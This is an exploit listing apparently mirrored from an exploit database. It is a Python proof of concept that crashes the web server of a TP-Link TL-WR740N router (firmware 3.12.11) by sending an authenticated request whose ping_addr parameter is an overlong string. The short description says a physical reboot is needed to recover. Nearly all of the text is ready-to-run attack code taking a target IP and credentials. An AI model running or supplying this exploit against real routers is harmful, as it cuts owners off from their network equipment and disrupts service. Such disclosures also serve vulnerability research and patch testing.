Exploit for TP-Link TL-WR740N Buffer Overflow / Denial Of Service

Name: Exploit for TP-Link TL-WR740N Buffer Overflow / Denial Of Service
Rating: 5 (142 reviews)
2024-03-11 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:177515
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'  
# Date: 8/12/2023  
# Exploit Author: Anish Feroz (ZEROXINN)  
# Vendor Homepage: http://www.tp-link.com  
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n  
# Tested on: TP-Link TL-WR740N  
  
#Description:  
  
#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.  
  
#Usage:  
  
#python3 target username password  
#change port, if required  
  
------------------------------------------------POC-----------------------------------------  
  
#!/usr/bin/python  
  
import requests  
from requests.auth import HTTPBasicAuth  
import base64  
  
def send_request(ip, username, password):  
auth_url = f"http://{ip}:8082"  
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"  
  
credentials = f"{username}:{password}"  
encoded_credentials = base64.b64encode(credentials.encode()).decode()  
  
headers = {  
"Host": f"{ip}:8082",  
"Authorization": f"Basic {encoded_credentials}",  
"Upgrade-Insecure-Requests": "1",  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",  
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"  
}  
  
session = requests.Session()  
  
response = session.get(target_url, headers=headers)  
  
if response.status_code == 200:  
print("Server Crashed")  
print(response.text)  
else:  
print(f"Script Completed with status code {response.status_code}")  
  
ip_address = input("Enter IP address of the host: ")  
username = input("Enter username: ")  
password = input("Enter password: ")  
  
send_request(ip_address, username, password)